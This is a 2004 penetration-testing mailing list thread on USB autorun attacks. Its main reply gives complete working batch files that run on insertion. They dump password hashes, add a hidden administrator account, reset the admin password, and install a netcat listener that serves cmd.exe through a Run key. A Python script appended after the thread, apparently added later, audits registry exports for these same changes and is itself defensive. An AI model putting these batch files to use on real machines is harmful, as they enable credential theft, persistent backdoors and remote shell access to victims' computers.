Penetration Testing mailing list archives
Re: USB delivered attacks (working example)
From: <mak_pen () hotmail com>
Date: 3 Jun 2004 15:03:11 -0000
In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

I have been using this "attack" for some time now. Below are the batch files (test.bat, b.bat and autorun.inf; autorun.inf calls test.bat) I use:

*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>

*********<BOF b.bat>
@explorer .
@echo off
::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add
::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t REG_DWORD /d 0 /f
::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 1 /f
::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu
::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>

I have tried this using a flash memory and it works. What happens is that it opens explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which I have documented above. To protect against this I have a registry file I use to disable autorun altogether. Contact me if you need it at: mak_pen(at)hotmail(dot)com

Cheers....
From: "Fred Gravel" <mindedsmasher () hotmail com>
To: pen-test () securityfocus com
Subject: Re: USB delivered attacks
Date: Wed, 02 Jun 2004 20:02:14 +0000
Message-ID: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

And after some search ... autorun is possible on a usb storage device... as explained just below ...

http://www.microsoft.com/whdc/device/storage/usbfaq.mspx

Q: What must I do to trigger Autorun on my USB storage device?

If you need to make a USB storage device that executes Autorun, the following two conditions must both be true:

- Media must be marked as removable.
- The device can be set to either static or removable.

We associate the "removable" nature of a device with the bus that it resides on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus would be regarded as removable by default. PnP uses a bit in the DEVICE_CAPABILITIES structure to determine this. For more information, see the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located at http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.

The "removable" nature of media is a property of the device. For example, in the case of a CD-ROM or a ZIP drive, the medium can be removed without the device itself going away, but on the other hand the medium and the disk cannot be separated on static storage PC cards. We obtain this information by using the StorageDeviceProperty request. For more information, see the STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.

----

Also the autorun could be used in "cooperation" with the desktop.ini file included in the folder(s) on the usb storage device if needed...
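
An added example, not part of either post: a Python check over a regedit text export for the registry changes the batch file above makes (an account hidden from the welcome screen, a Run value that hands cmd.exe to another program) and for whether autorun is disabled through NoDriveTypeAutoRun. The function names and the sample export are constructed for this example; treating 0xFF as "disabled for all drive types" is the assumption behind the last check.

```python
import re

# Keys the batch file in the post writes to, plus the policy key that disables autorun.
USERLIST = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist"
RUN = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
POLICY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer"
SHELL_ARG = re.compile(r"-e\s+\S*cmd\.exe", re.I)  # program told to execute cmd.exe

def parse_reg(text):
    """Parse regedit export text into {lowercased key: {value name: raw data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None and line.startswith('"'):
            m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
            if m:
                current[m.group(1)] = m.group(2)
    return keys

def audit(text):
    """Return a list of (severity, message) findings for one export."""
    keys, findings = parse_reg(text), []
    for name, data in keys.get(USERLIST, {}).items():
        if data.lower() == "dword:00000000":  # 0 hides the account from the welcome screen
            findings.append(("high", f"account hidden from welcome screen: {name}"))
    for name, data in keys.get(RUN, {}).items():
        if SHELL_ARG.search(data):
            findings.append(("high", f"Run value {name!r} starts a program with a cmd.exe handoff"))
    autorun = keys.get(POLICY, {}).get("NoDriveTypeAutoRun", "").lower()
    if autorun != "dword:000000ff":  # assumption: 0xFF = autorun off for every drive type
        findings.append(("medium", "autorun is not disabled for all drive types"))
    return findings

# Constructed sample export (not taken from a real host).
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"svc_example"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Program Files\\Vendor\\update.exe"
"Taskbr"="C:\\tools\\nc.exe -L -d -p 80 -e cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
'''

if __name__ == "__main__":
    for severity, message in audit(SAMPLE):
        print(f"[{severity}] {message}")
```
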